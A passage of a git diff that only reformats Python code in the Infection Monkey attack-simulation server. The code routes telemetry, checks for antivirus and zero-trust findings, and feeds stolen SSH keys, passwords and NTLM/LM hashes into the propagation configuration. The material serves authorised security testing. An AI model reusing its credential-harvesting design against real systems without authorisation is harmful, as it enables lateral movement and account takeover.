= logging.getLogger(__name__) -TELEMETRY_CATEGORY_TO_PROCESSING_FUNC = \ - { - TelemCategoryEnum.TUNNEL: process_tunnel_telemetry, - TelemCategoryEnum.STATE: process_state_telemetry, - TelemCategoryEnum.EXPLOIT: process_exploit_telemetry, - TelemCategoryEnum.SCAN: process_scan_telemetry, - TelemCategoryEnum.SYSTEM_INFO: process_system_info_telemetry, - TelemCategoryEnum.POST_BREACH: process_post_breach_telemetry, - TelemCategoryEnum.SCOUTSUITE: process_scoutsuite_telemetry, - # `lambda *args, **kwargs: None` is a no-op. - TelemCategoryEnum.TRACE: lambda *args, **kwargs: None, - TelemCategoryEnum.ATTACK: lambda *args, **kwargs: None, - } +TELEMETRY_CATEGORY_TO_PROCESSING_FUNC = { + TelemCategoryEnum.TUNNEL: process_tunnel_telemetry, + TelemCategoryEnum.STATE: process_state_telemetry, + TelemCategoryEnum.EXPLOIT: process_exploit_telemetry, + TelemCategoryEnum.SCAN: process_scan_telemetry, + TelemCategoryEnum.SYSTEM_INFO: process_system_info_telemetry, + TelemCategoryEnum.POST_BREACH: process_post_breach_telemetry, + TelemCategoryEnum.SCOUTSUITE: process_scoutsuite_telemetry, + # `lambda *args, **kwargs: None` is a no-op. + TelemCategoryEnum.TRACE: lambda *args, **kwargs: None, + TelemCategoryEnum.ATTACK: lambda *args, **kwargs: None, +} def process_telemetry(telemetry_json): try: - telem_category = telemetry_json.get('telem_category') + telem_category = telemetry_json.get("telem_category") if telem_category in TELEMETRY_CATEGORY_TO_PROCESSING_FUNC: TELEMETRY_CATEGORY_TO_PROCESSING_FUNC[telem_category](telemetry_json) else: - logger.info('Got unknown type of telemetry: %s' % telem_category) + logger.info("Got unknown type of telemetry: %s" % telem_category) except Exception as ex: - logger.error("Exception caught while processing telemetry. Info: {}".format(ex), exc_info=True) + logger.error( + "Exception caught while processing telemetry. Info: {}".format(ex), exc_info=True + ) diff --git a/monkey/monkey_island/cc/services/telemetry/processing/scan.py b/monkey/monkey_island/cc/services/telemetry/processing/scan.py index d0b204d16..764cd3044 100644 --- a/monkey/monkey_island/cc/services/telemetry/processing/scan.py +++ b/monkey/monkey_island/cc/services/telemetry/processing/scan.py @@ -1,17 +1,23 @@ from monkey_island.cc.database import mongo from monkey_island.cc.models import Monkey from monkey_island.cc.services.node import NodeService -from monkey_island.cc.services.telemetry.processing.utils import get_edge_by_scan_or_exploit_telemetry -from monkey_island.cc.services.telemetry.zero_trust_checks.data_endpoints import check_open_data_endpoints -from monkey_island.cc.services.telemetry.zero_trust_checks.segmentation import check_segmentation_violation +from monkey_island.cc.services.telemetry.processing.utils import ( + get_edge_by_scan_or_exploit_telemetry, +) +from monkey_island.cc.services.telemetry.zero_trust_checks.data_endpoints import ( + check_open_data_endpoints, +) +from monkey_island.cc.services.telemetry.zero_trust_checks.segmentation import ( + check_segmentation_violation, +) def process_scan_telemetry(telemetry_json): update_edges_and_nodes_based_on_scan_telemetry(telemetry_json) check_open_data_endpoints(telemetry_json) - current_monkey = Monkey.get_single_monkey_by_guid(telemetry_json['monkey_guid']) - target_ip = telemetry_json['data']['machine']['ip_addr'] + current_monkey = Monkey.get_single_monkey_by_guid(telemetry_json["monkey_guid"]) + target_ip = telemetry_json["data"]["machine"]["ip_addr"] check_segmentation_violation(current_monkey, target_ip) @@ -21,14 +27,14 @@ def update_edges_and_nodes_based_on_scan_telemetry(telemetry_json): node = mongo.db.node.find_one({"_id": edge.dst_node_id}) if node is not None: - scan_os = telemetry_json['data']['machine']["os"] + scan_os = telemetry_json["data"]["machine"]["os"] if "type" in scan_os: - mongo.db.node.update({"_id": node["_id"]}, - {"$set": {"os.type": scan_os["type"]}}, - upsert=False) + mongo.db.node.update( + {"_id": node["_id"]}, {"$set": {"os.type": scan_os["type"]}}, upsert=False + ) if "version" in scan_os: - mongo.db.node.update({"_id": node["_id"]}, - {"$set": {"os.version": scan_os["version"]}}, - upsert=False) + mongo.db.node.update( + {"_id": node["_id"]}, {"$set": {"os.version": scan_os["version"]}}, upsert=False + ) label = NodeService.get_label_for_endpoint(node["_id"]) edge.update_label(node["_id"], label) diff --git a/monkey/monkey_island/cc/services/telemetry/processing/scoutsuite.py b/monkey/monkey_island/cc/services/telemetry/processing/scoutsuite.py index 9160861ea..5f2677bcb 100644 --- a/monkey/monkey_island/cc/services/telemetry/processing/scoutsuite.py +++ b/monkey/monkey_island/cc/services/telemetry/processing/scoutsuite.py @@ -2,18 +2,24 @@ import json from monkey_island.cc.database import mongo from monkey_island.cc.models.zero_trust.scoutsuite_data_json import ScoutSuiteRawDataJson -from monkey_island.cc.services.zero_trust.scoutsuite.consts.scoutsuite_findings_list import SCOUTSUITE_FINDINGS +from monkey_island.cc.services.zero_trust.scoutsuite.consts.scoutsuite_findings_list import ( + SCOUTSUITE_FINDINGS, +) from monkey_island.cc.services.zero_trust.scoutsuite.consts.service_consts import SERVICES from monkey_island.cc.services.zero_trust.scoutsuite.data_parsing.rule_parser import RuleParser -from monkey_island.cc.services.zero_trust.scoutsuite.scoutsuite_rule_service import ScoutSuiteRuleService -from monkey_island.cc.services.zero_trust.scoutsuite.scoutsuite_zt_finding_service import ScoutSuiteZTFindingService +from monkey_island.cc.services.zero_trust.scoutsuite.scoutsuite_rule_service import ( + ScoutSuiteRuleService, +) +from monkey_island.cc.services.zero_trust.scoutsuite.scoutsuite_zt_finding_service import ( + ScoutSuiteZTFindingService, +) def process_scoutsuite_telemetry(telemetry_json): # Encode data to json, because mongo can't save it as document (invalid document keys) - telemetry_json['data'] = json.dumps(telemetry_json['data']) - ScoutSuiteRawDataJson.add_scoutsuite_data(telemetry_json['data']) - scoutsuite_data = json.loads(telemetry_json['data'])['data'] + telemetry_json["data"] = json.dumps(telemetry_json["data"]) + ScoutSuiteRawDataJson.add_scoutsuite_data(telemetry_json["data"]) + scoutsuite_data = json.loads(telemetry_json["data"])["data"] create_scoutsuite_findings(scoutsuite_data[SERVICES]) update_data(telemetry_json) @@ -28,5 +34,5 @@ def create_scoutsuite_findings(cloud_services: dict): def update_data(telemetry_json): mongo.db.scoutsuite.insert_one( - {'guid': telemetry_json['monkey_guid']}, - {'results': telemetry_json['data']}) + {"guid": telemetry_json["monkey_guid"]}, {"results": telemetry_json["data"]} + ) diff --git a/monkey/monkey_island/cc/services/telemetry/processing/state.py b/monkey/monkey_island/cc/services/telemetry/processing/state.py index 4f596fb88..8749cc730 100644 --- a/monkey/monkey_island/cc/services/telemetry/processing/state.py +++ b/monkey/monkey_island/cc/services/telemetry/processing/state.py @@ -2,23 +2,26 @@ import logging from monkey_island.cc.models import Monkey from monkey_island.cc.services.node import NodeService -from monkey_island.cc.services.telemetry.zero_trust_checks.segmentation import \ - check_passed_findings_for_unreached_segments +from monkey_island.cc.services.telemetry.zero_trust_checks.segmentation import ( + check_passed_findings_for_unreached_segments, +) logger = logging.getLogger(__name__) def process_state_telemetry(telemetry_json): - monkey = NodeService.get_monkey_by_guid(telemetry_json['monkey_guid']) - NodeService.add_communication_info(monkey, telemetry_json['command_control_channel']) - if telemetry_json['data']['done']: + monkey = NodeService.get_monkey_by_guid(telemetry_json["monkey_guid"]) + NodeService.add_communication_info(monkey, telemetry_json["command_control_channel"]) + if telemetry_json["data"]["done"]: NodeService.set_monkey_dead(monkey, True) else: NodeService.set_monkey_dead(monkey, False) - if telemetry_json['data']['done']: - current_monkey = Monkey.get_single_monkey_by_guid(telemetry_json['monkey_guid']) + if telemetry_json["data"]["done"]: + current_monkey = Monkey.get_single_monkey_by_guid(telemetry_json["monkey_guid"]) check_passed_findings_for_unreached_segments(current_monkey) - if telemetry_json['data']['version']: - logger.info(f"monkey {telemetry_json['monkey_guid']} has version {telemetry_json['data']['version']}") + if telemetry_json["data"]["version"]: + logger.info( + f"monkey {telemetry_json['monkey_guid']} has version {telemetry_json['data']['version']}" + ) diff --git a/monkey/monkey_island/cc/services/telemetry/processing/system_info.py b/monkey/monkey_island/cc/services/telemetry/processing/system_info.py index 250080697..3313b763d 100644 --- a/monkey/monkey_island/cc/services/telemetry/processing/system_info.py +++ b/monkey/monkey_island/cc/services/telemetry/processing/system_info.py @@ -3,8 +3,9 @@ import logging from monkey_island.cc.server_utils.encryptor import get_encryptor from monkey_island.cc.services.config import ConfigService from monkey_island.cc.services.node import NodeService -from monkey_island.cc.services.telemetry.processing.system_info_collectors.system_info_telemetry_dispatcher import \ - SystemInfoTelemetryDispatcher +from monkey_island.cc.services.telemetry.processing.system_info_collectors.system_info_telemetry_dispatcher import ( + SystemInfoTelemetryDispatcher, +) from monkey_island.cc.services.wmi_handler import WMIHandler logger = logging.getLogger(__name__) @@ -16,7 +17,7 @@ def process_system_info_telemetry(telemetry_json): process_ssh_info, process_credential_info, process_wmi_info, - dispatcher.dispatch_collector_results_to_relevant_processors + dispatcher.dispatch_collector_results_to_relevant_processors, ] # Calling safe_process_telemetry so if one of the stages fail, we log and move on instead of failing the rest of @@ -31,70 +32,74 @@ def safe_process_telemetry(processing_function, telemetry_json): processing_function(telemetry_json) except Exception as err: logger.error( - "Error {} while in {} stage of processing telemetry.".format(str(err), processing_function.__name__), - exc_info=True) + "Error {} while in {} stage of processing telemetry.".format( + str(err), processing_function.__name__ + ), + exc_info=True, + ) def process_ssh_info(telemetry_json): - if 'ssh_info' in telemetry_json['data']: - ssh_info = telemetry_json['data']['ssh_info'] + if "ssh_info" in telemetry_json["data"]: + ssh_info = telemetry_json["data"]["ssh_info"] encrypt_system_info_ssh_keys(ssh_info) - if telemetry_json['data']['network_info']['networks']: + if telemetry_json["data"]["network_info"]["networks"]: # We use user_name@machine_ip as the name of the ssh key stolen, thats why we need ip from telemetry - add_ip_to_ssh_keys(telemetry_json['data']['network_info']['networks'][0], ssh_info) + add_ip_to_ssh_keys(telemetry_json["data"]["network_info"]["networks"][0], ssh_info) add_system_info_ssh_keys_to_config(ssh_info) def add_system_info_ssh_keys_to_config(ssh_info): for user in ssh_info: - ConfigService.creds_add_username(user['name']) + ConfigService.creds_add_username(user["name"]) # Public key is useless without private key - if user['public_key'] and user['private_key']: - ConfigService.ssh_add_keys(user['public_key'], user['private_key'], - user['name'], user['ip']) + if user["public_key"] and user["private_key"]: + ConfigService.ssh_add_keys( + user["public_key"], user["private_key"], user["name"], user["ip"] + ) def add_ip_to_ssh_keys(ip, ssh_info): for key in ssh_info: - key['ip'] = ip['addr'] + key["ip"] = ip["addr"] def encrypt_system_info_ssh_keys(ssh_info): for idx, user in enumerate(ssh_info): - for field in ['public_key', 'private_key', 'known_hosts']: + for field in ["public_key", "private_key", "known_hosts"]: if ssh_info[idx][field]: ssh_info[idx][field] = get_encryptor().enc(ssh_info[idx][field]) def process_credential_info(telemetry_json): - if 'credentials' in telemetry_json['data']: - creds = telemetry_json['data']['credentials'] + if "credentials" in telemetry_json["data"]: + creds = telemetry_json["data"]["credentials"] add_system_info_creds_to_config(creds) replace_user_dot_with_comma(creds) def replace_user_dot_with_comma(creds): for user in creds: - if -1 != user.find('.'): - new_user = user.replace('.', ',') + if -1 != user.find("."): + new_user = user.replace(".", ",") creds[new_user] = creds.pop(user) def add_system_info_creds_to_config(creds): for user in creds: - ConfigService.creds_add_username(creds[user]['username']) - if 'password' in creds[user] and creds[user]['password']: - ConfigService.creds_add_password(creds[user]['password']) - if 'lm_hash' in creds[user] and creds[user]['lm_hash']: - ConfigService.creds_add_lm_hash(creds[user]['lm_hash']) - if 'ntlm_hash' in creds[user] and creds[user]['ntlm_hash']: - ConfigService.creds_add_ntlm_hash(creds[user]['ntlm_hash']) + ConfigService.creds_add_username(creds[user]["username"]) + if "password" in creds[user] and creds[user]["password"]: + ConfigService.creds_add_password(creds[user]["password"]) + if "lm_hash" in creds[user] and creds[user]["lm_hash"]: + ConfigService.creds_add_lm_hash(creds[user]["lm_hash"]) + if "ntlm_hash" in creds[user] and creds[user]["ntlm_hash"]: + ConfigService.creds_add_ntlm_hash(creds[user]["ntlm_hash"]) def process_wmi_info(telemetry_json): users_secrets = {} - if 'wmi' in telemetry_json['data']: - monkey_id = NodeService.get_monkey_by_guid(telemetry_json['monkey_guid']).get('_id') - wmi_handler = WMIHandler(monkey_id, telemetry_json['data']['wmi'], users_secrets) + if "wmi" in telemetry_json["data"]: + monkey_id = NodeService.get_monkey_by_guid(telemetry_json["monkey_guid"]).get("_id") + wmi_handler = WMIHandler(monkey_id, telemetry_json["data"]["wmi"], users_secrets) wmi_handler.process_and_handle_wmi_info() diff --git a/monkey/monkey_island/cc/services/telemetry/processing/system_info_collectors/aws.py b/monkey/monkey_island/cc/services/telemetry/processing/system_info_collectors/aws.py index 2b4d8085e..0fae438d4 100644 --- a/monkey/monkey_island/cc/services/telemetry/processing/system_info_collectors/aws.py +++ b/monkey/monkey_island/cc/services/telemetry/processing/system_info_collectors/aws.py @@ -12,4 +12,6 @@ def process_aws_telemetry(collector_results, monkey_guid): instance_id = collector_results["instance_id"] relevant_monkey.aws_instance_id = instance_id relevant_monkey.save() - logger.debug("Updated Monkey {} with aws instance id {}".format(str(relevant_monkey), instance_id)) + logger.debug( + "Updated Monkey {} with aws instance id {}".format(str(relevant_monkey), instance_id) + ) diff --git a/monkey/monkey_island/cc/services/telemetry/processing/system_info_collectors/system_info_telemetry_dispatcher.py b/monkey/monkey_island/cc/services/telemetry/processing/system_info_collectors/system_info_telemetry_dispatcher.py index 6d9ec8492..894bdce75 100644 --- a/monkey/monkey_island/cc/services/telemetry/processing/system_info_collectors/system_info_telemetry_dispatcher.py +++ b/monkey/monkey_island/cc/services/telemetry/processing/system_info_collectors/system_info_telemetry_dispatcher.py @@ -1,13 +1,24 @@ import logging import typing -from common.common_consts.system_info_collectors_names import (AWS_COLLECTOR, ENVIRONMENT_COLLECTOR, HOSTNAME_COLLECTOR, - PROCESS_LIST_COLLECTOR) -from monkey_island.cc.services.telemetry.processing.system_info_collectors.aws import process_aws_telemetry -from monkey_island.cc.services.telemetry.processing.system_info_collectors.environment import \ - process_environment_telemetry -from monkey_island.cc.services.telemetry.processing.system_info_collectors.hostname import process_hostname_telemetry -from monkey_island.cc.services.telemetry.zero_trust_checks.antivirus_existence import check_antivirus_existence +from common.common_consts.system_info_collectors_names import ( + AWS_COLLECTOR, + ENVIRONMENT_COLLECTOR, + HOSTNAME_COLLECTOR, + PROCESS_LIST_COLLECTOR, +) +from monkey_island.cc.services.telemetry.processing.system_info_collectors.aws import ( + process_aws_telemetry, +) +from monkey_island.cc.services.telemetry.processing.system_info_collectors.environment import ( + process_environment_telemetry, +) +from monkey_island.cc.services.telemetry.processing.system_info_collectors.hostname import ( + process_hostname_telemetry, +) +from monkey_island.cc.services.telemetry.zero_trust_checks.antivirus_existence import ( + check_antivirus_existence, +) logger = logging.getLogger(__name__) @@ -15,12 +26,15 @@ SYSTEM_INFO_COLLECTOR_TO_TELEMETRY_PROCESSORS = { AWS_COLLECTOR: [process_aws_telemetry], ENVIRONMENT_COLLECTOR: [process_environment_telemetry], HOSTNAME_COLLECTOR: [process_hostname_telemetry], - PROCESS_LIST_COLLECTOR: [check_antivirus_existence] + PROCESS_LIST_COLLECTOR: [check_antivirus_existence], } class SystemInfoTelemetryDispatcher(object): - def __init__(self, collector_to_parsing_functions: typing.Mapping[str, typing.List[typing.Callable]] = None): + def __init__( + self, + collector_to_parsing_functions: typing.Mapping[str, typing.List[typing.Callable]] = None, + ): """ :param collector_to_parsing_functions: Map between collector names and a list of functions that process the output of that collector. @@ -40,19 +54,16 @@ class SystemInfoTelemetryDispatcher(object): self.dispatch_single_result_to_relevant_processor(telemetry_json) def dispatch_single_result_to_relevant_processor(self, telemetry_json): - relevant_monkey_guid = telemetry_json['monkey_guid'] + relevant_monkey_guid = telemetry_json["monkey_guid"] for collector_name, collector_results in telemetry_json["data"]["collectors"].items(): self.dispatch_result_of_single_collector_to_processing_functions( - collector_name, - collector_results, - relevant_monkey_guid) + collector_name, collector_results, relevant_monkey_guid + ) def dispatch_result_of_single_collector_to_processing_functions( - self, - collector_name, - collector_results, - relevant_monkey_guid): + self, collector_name, collector_results, relevant_monkey_guid + ): if collector_name in self.collector_to_processing_functions: for processing_function in self.collector_to_processing_functions[collector_name]: # noinspection PyBroadException @@ -60,7 +71,10 @@ class SystemInfoTelemetryDispatcher(object): processing_function(collector_results, relevant_monkey_guid) except Exception as e: logger.error( - "Error {} while processing {} system info telemetry".format(str(e), collector_name), - exc_info=True) + "Error {} while processing {} system info telemetry".format( + str(e), collector_name + ), + exc_info=True, + ) else: logger.warning("Unknown system info collector name: {}".format(collector_name)) diff --git a/monkey/monkey_island/cc/services/telemetry/processing/system_info_collectors/test_environment.py b/monkey/monkey_island/cc/services/telemetry/processing/system_info_collectors/test_environment.py index 6369ea9e1..f1e53d5f4 100644 --- a/monkey/monkey_island/cc/services/telemetry/processing/system_info_collectors/test_environment.py +++ b/monkey/monkey_island/cc/services/telemetry/processing/system_info_collectors/test_environment.py @@ -1,8 +1,9 @@ import uuid from monkey_island.cc.models import Monkey -from monkey_island.cc.services.telemetry.processing.system_info_collectors.system_info_telemetry_dispatcher import \ - SystemInfoTelemetryDispatcher +from monkey_island.cc.services.telemetry.processing.system_info_collectors.system_info_telemetry_dispatcher import ( + SystemInfoTelemetryDispatcher, +) class TestEnvironmentTelemetryProcessing: @@ -20,7 +21,7 @@ class TestEnvironmentTelemetryProcessing: "EnvironmentCollector": {"environment": on_premise}, } }, - "monkey_guid": monkey_guid + "monkey_guid": monkey_guid, } dispatcher.dispatch_collector_results_to_relevant_processors(telem_json) diff --git a/monkey/monkey_island/cc/services/telemetry/processing/system_info_collectors/test_system_info_telemetry_dispatcher.py b/monkey/monkey_island/cc/services/telemetry/processing/system_info_collectors/test_system_info_telemetry_dispatcher.py index eed93058a..0335c6e65 100644 --- a/monkey/monkey_island/cc/services/telemetry/processing/system_info_collectors/test_system_info_telemetry_dispatcher.py +++ b/monkey/monkey_island/cc/services/telemetry/processing/system_info_collectors/test_system_info_telemetry_dispatcher.py @@ -4,7 +4,9 @@ import pytest from monkey_island.cc.models import Monkey from monkey_island.cc.services.telemetry.processing.system_info_collectors.system_info_telemetry_dispatcher import ( - SystemInfoTelemetryDispatcher, process_aws_telemetry) + SystemInfoTelemetryDispatcher, + process_aws_telemetry, +) TEST_SYS_INFO_TO_PROCESSING = { "AwsCollector": [process_aws_telemetry], @@ -31,7 +33,10 @@ class TestSystemInfoTelemetryDispatcher: # Telem JSON with no collectors - nothing gets dispatched good_telem_no_collectors = {"monkey_guid": "bla", "data": {"bla": "bla"}} - good_telem_empty_collectors = {"monkey_guid": "bla", "data": {"bla": "bla", "collectors": {}}} + good_telem_empty_collectors = { + "monkey_guid": "bla", + "data": {"bla": "bla", "collectors": {}}, + } dispatcher.dispatch_collector_results_to_relevant_processors(good_telem_no_collectors) dispatcher.dispatch_collector_results_to_relevant_processors(good_telem_empty_collectors) @@ -50,7 +55,7 @@ class TestSystemInfoTelemetryDispatcher: "AwsCollector": {"instance_id": instance_id}, } }, - "monkey_guid": a_monkey.guid + "monkey_guid": a_monkey.guid, } dispatcher.dispatch_collector_results_to_relevant_processors(telem_json) diff --git a/monkey/monkey_island/cc/services/telemetry/processing/test_post_breach.py b/monkey/monkey_island/cc/services/telemetry/processing/test_post_breach.py index 0999e285e..882339119 100644 --- a/monkey/monkey_island/cc/services/telemetry/processing/test_post_breach.py +++ b/monkey/monkey_island/cc/services/telemetry/processing/test_post_breach.py @@ -4,75 +4,67 @@ import monkey_island.cc.services.telemetry.processing.post_breach as post_breach from .post_breach import EXECUTION_WITHOUT_OUTPUT -original_telem_multiple_results =\ - { - 'data': { - 'command': 'COMMAND', - 'hostname': 'HOST', - 'ip': '127.0.1.1', - 'name': 'PBA NAME', - 'result': [ - ['SUCCESSFUL', True], - ['UNSUCCESFUL', False], - ['', True] - ] +original_telem_multiple_results = { + "data": { + "command": "COMMAND", + "hostname": "HOST", + "ip": "127.0.1.1", + "name": "PBA NAME", + "result": [["SUCCESSFUL", True], ["UNSUCCESFUL", False], ["", True]], + }, + "telem_category": "post_breach", +} + +expected_telem_multiple_results = { + "data": [ + { + "command": "COMMAND", + "hostname": "HOST", + "ip": "127.0.1.1", + "name": "PBA NAME", + "result": ["SUCCESSFUL", True], }, - 'telem_category': 'post_breach' - } - -expected_telem_multiple_results =\ - { - 'data': [ - { - 'command': 'COMMAND', - 'hostname': 'HOST', - 'ip': '127.0.1.1', - 'name': 'PBA NAME', - 'result': ['SUCCESSFUL', True] - }, - { - 'command': 'COMMAND', - 'hostname': 'HOST', - 'ip': '127.0.1.1', - 'name': 'PBA NAME', - 'result': ['UNSUCCESFUL', False] - }, - { - 'command': 'COMMAND', - 'hostname': 'HOST', - 'ip': '127.0.1.1', - 'name': 'PBA NAME', - 'result': [EXECUTION_WITHOUT_OUTPUT, True] - } - ], - 'telem_category': 'post_breach' - } - -original_telem_single_result =\ - { - 'data': { - 'command': 'COMMAND', - 'hostname': 'HOST', - 'ip': '127.0.1.1', - 'name': 'PBA NAME', - 'result': ['', True] + { + "command": "COMMAND", + "hostname": "HOST", + "ip": "127.0.1.1", + "name": "PBA NAME", + "result": ["UNSUCCESFUL", False], }, - 'telem_category': 'post_breach' - } + { + "command": "COMMAND", + "hostname": "HOST", + "ip": "127.0.1.1", + "name": "PBA NAME", + "result": [EXECUTION_WITHOUT_OUTPUT, True], + }, + ], + "telem_category": "post_breach", +} -expected_telem_single_result =\ - { - 'data': [ - { - 'command': 'COMMAND', - 'hostname': 'HOST', - 'ip': '127.0.1.1', - 'name': 'PBA NAME', - 'result': [EXECUTION_WITHOUT_OUTPUT, True] - }, - ], - 'telem_category': 'post_breach' - } +original_telem_single_result = { + "data": { + "command": "COMMAND", + "hostname": "HOST", + "ip": "127.0.1.1", + "name": "PBA NAME", + "result": ["", True], + }, + "telem_category": "post_breach", +} + +expected_telem_single_result = { + "data": [ + { + "command": "COMMAND", + "hostname": "HOST", + "ip": "127.0.1.1", + "name": "PBA NAME", + "result": [EXECUTION_WITHOUT_OUTPUT, True], + }, + ], + "telem_category": "post_breach", +} def test_process_post_breach_telemetry(): diff --git a/monkey/monkey_island/cc/services/telemetry/processing/tunnel.py b/monkey/monkey_island/cc/services/telemetry/processing/tunnel.py index 1e20e5443..4464eb82a 100644 --- a/monkey/monkey_island/cc/services/telemetry/processing/tunnel.py +++ b/monkey/monkey_island/cc/services/telemetry/processing/tunnel.py @@ -1,12 +1,14 @@ from monkey_island.cc.services.node import NodeService from monkey_island.cc.services.telemetry.processing.utils import get_tunnel_host_ip_from_proxy_field -from monkey_island.cc.services.telemetry.zero_trust_checks.tunneling import check_tunneling_violation +from monkey_island.cc.services.telemetry.zero_trust_checks.tunneling import ( + check_tunneling_violation, +) def process_tunnel_telemetry(telemetry_json): check_tunneling_violation(telemetry_json) - monkey_id = NodeService.get_monkey_by_guid(telemetry_json['monkey_guid'])["_id"] - if telemetry_json['data']['proxy'] is not None: + monkey_id = NodeService.get_monkey_by_guid(telemetry_json["monkey_guid"])["_id"] + if telemetry_json["data"]["proxy"] is not None: tunnel_host_ip = get_tunnel_host_ip_from_proxy_field(telemetry_json) NodeService.set_monkey_tunnel(monkey_id, tunnel_host_ip) else: diff --git a/monkey/monkey_island/cc/services/telemetry/processing/utils.py b/monkey/monkey_island/cc/services/telemetry/processing/utils.py index df898945e..ffa6960f6 100644 --- a/monkey/monkey_island/cc/services/telemetry/processing/utils.py +++ b/monkey/monkey_island/cc/services/telemetry/processing/utils.py @@ -3,9 +3,9 @@ from monkey_island.cc.services.node import NodeService def get_edge_by_scan_or_exploit_telemetry(telemetry_json): - dst_ip = telemetry_json['data']['machine']['ip_addr'] - dst_domain_name = telemetry_json['data']['machine']['domain_name'] - src_monkey = NodeService.get_monkey_by_guid(telemetry_json['monkey_guid']) + dst_ip = telemetry_json["data"]["machine"]["ip_addr"] + dst_domain_name = telemetry_json["data"]["machine"]["domain_name"] + src_monkey = NodeService.get_monkey_by_guid(telemetry_json["monkey_guid"]) dst_node = NodeService.get_monkey_by_ip(dst_ip) if dst_node is None: dst_node = NodeService.get_or_create_node(dst_ip, dst_domain_name) @@ -17,5 +17,5 @@ def get_edge_by_scan_or_exploit_telemetry(telemetry_json): def get_tunnel_host_ip_from_proxy_field(telemetry_json): - tunnel_host_ip = telemetry_json['data']['proxy'].split(":")[-2].replace("//", "") + tunnel_host_ip = telemetry_json["data"]["proxy"].split(":")[-2].replace("//", "") return tunnel_host_ip diff --git a/monkey/monkey_island/cc/services/telemetry/zero_trust_checks/antivirus_existence.py b/monkey/monkey_island/cc/services/telemetry/zero_trust_checks/antivirus_existence.py index a6b90cc45..d2f154a9e 100644 --- a/monkey/monkey_island/cc/services/telemetry/zero_trust_checks/antivirus_existence.py +++ b/monkey/monkey_island/cc/services/telemetry/zero_trust_checks/antivirus_existence.py @@ -3,8 +3,12 @@ import json import common.common_consts.zero_trust_consts as zero_trust_consts from monkey_island.cc.models import Monkey from monkey_island.cc.models.zero_trust.event import Event -from monkey_island.cc.services.telemetry.zero_trust_checks.known_anti_viruses import ANTI_VIRUS_KNOWN_PROCESS_NAMES -from monkey_island.cc.services.zero_trust.monkey_findings.monkey_zt_finding_service import MonkeyZTFindingService +from monkey_island.cc.services.telemetry.zero_trust_checks.known_anti_viruses import ( + ANTI_VIRUS_KNOWN_PROCESS_NAMES, +) +from monkey_island.cc.services.zero_trust.monkey_findings.monkey_zt_finding_service import ( + MonkeyZTFindingService, +) def check_antivirus_existence(process_list_json, monkey_guid): @@ -13,33 +17,39 @@ def check_antivirus_existence(process_list_json, monkey_guid): process_list_event = Event.create_event( title="Process list", message="Monkey on {} scanned the process list".format(current_monkey.hostname), - event_type=zero_trust_consts.EVENT_TYPE_MONKEY_LOCAL) + event_type=zero_trust_consts.EVENT_TYPE_MONKEY_LOCAL, + ) events = [process_list_event] av_processes = filter_av_processes(process_list_json["process_list"]) for process in av_processes: - events.append(Event.create_event( - title="Found AV process", - message="The process '{}' was recognized as an Anti Virus process. Process " - "details: {}".format(process[1]['name'], json.dumps(process[1])), - event_type=zero_trust_consts.EVENT_TYPE_MONKEY_LOCAL - )) + events.append( + Event.create_event( + title="Found AV process", + message="The process '{}' was recognized as an Anti Virus process. Process " + "details: {}".format(process[1]["name"], json.dumps(process[1])), + event_type=zero_trust_consts.EVENT_TYPE_MONKEY_LOCAL, + ) + ) if len(av_processes) > 0: test_status = zero_trust_consts.STATUS_PASSED else: test_status = zero_trust_consts.STATUS_FAILED - MonkeyZTFindingService.create_or_add_to_existing(test=zero_trust_consts.TEST_ENDPOINT_SECURITY_EXISTS, - status=test_status, events=events) + MonkeyZTFindingService.create_or_add_to_existing( + test=zero_trust_consts.TEST_ENDPOINT_SECURITY_EXISTS, status=test_status, events=events + ) def filter_av_processes(process_list): all_processes = list(process_list.items()) av_processes = [] for process in all_processes: - process_name = process[1]['name'] + process_name = process[1]["name"] # This is for case-insensitive `in`. Generator expression is to save memory. - if process_name.upper() in (known_av_name.upper() for known_av_name in ANTI_VIRUS_KNOWN_PROCESS_NAMES): + if process_name.upper() in ( + known_av_name.upper() for known_av_name in ANTI_VIRUS_KNOWN_PROCESS_NAMES + ): av_processes.append(process) return av_processes diff --git a/monkey/monkey_island/cc/services/telemetry/zero_trust_checks/communicate_as_new_user.py b/monkey/monkey_island/cc/services/telemetry/zero_trust_checks/communicate_as_new_user.py index 2ef914786..74007b5fd 100644 --- a/monkey/monkey_island/cc/services/telemetry/zero_trust_checks/communicate_as_new_user.py +++ b/monkey/monkey_island/cc/services/telemetry/zero_trust_checks/communicate_as_new_user.py @@ -1,34 +1,43 @@ import common.common_consts.zero_trust_consts as zero_trust_consts from monkey_island.cc.models.zero_trust.event import Event -from monkey_island.cc.services.zero_trust.monkey_findings.monkey_zt_finding_service import MonkeyZTFindingService +from monkey_island.cc.services.zero_trust.monkey_findings.monkey_zt_finding_service import ( + MonkeyZTFindingService, +) COMM_AS_NEW_USER_FAILED_FORMAT = "Monkey on {} couldn't communicate as new user. Details: {}" -COMM_AS_NEW_USER_SUCCEEDED_FORMAT = \ - "New user created by Monkey on {} successfully tried to communicate with the internet. Details: {}" +COMM_AS_NEW_USER_SUCCEEDED_FORMAT = "New user created by Monkey on {} successfully tried to communicate with the internet. Details: {}" def check_new_user_communication(current_monkey, success, message): status = zero_trust_consts.STATUS_FAILED if success else zero_trust_consts.STATUS_PASSED - MonkeyZTFindingService.create_or_add_to_existing(test=zero_trust_consts.TEST_COMMUNICATE_AS_NEW_USER, - status=status, - events=[ - get_attempt_event(current_monkey), - get_result_event(current_monkey, message, success) - ]) + MonkeyZTFindingService.create_or_add_to_existing( + test=zero_trust_consts.TEST_COMMUNICATE_AS_NEW_USER, + status=status, + events=[ + get_attempt_event(current_monkey), + get_result_event(current_monkey, message, success), + ], + ) def get_attempt_event(current_monkey): tried_to_communicate_event = Event.create_event( title="Communicate as new user", - message="Monkey on {} tried to create a new user and communicate from it.".format(current_monkey.hostname), - event_type=zero_trust_consts.EVENT_TYPE_MONKEY_NETWORK) + message="Monkey on {} tried to create a new user and communicate from it.".format( + current_monkey.hostname + ), + event_type=zero_trust_consts.EVENT_TYPE_MONKEY_NETWORK, + ) return tried_to_communicate_event def get_result_event(current_monkey, message, success): - message_format = COMM_AS_NEW_USER_SUCCEEDED_FORMAT if success else COMM_AS_NEW_USER_FAILED_FORMAT + message_format = ( + COMM_AS_NEW_USER_SUCCEEDED_FORMAT if success else COMM_AS_NEW_USER_FAILED_FORMAT + ) return Event.create_event( title="Communicate as new user", message=message_format.format(current_monkey.hostname, message), - event_type=zero_trust_consts.EVENT_TYPE_MONKEY_NETWORK) + event_type=zero_trust_consts.EVENT_TYPE_MONKEY_NETWORK, + ) diff --git 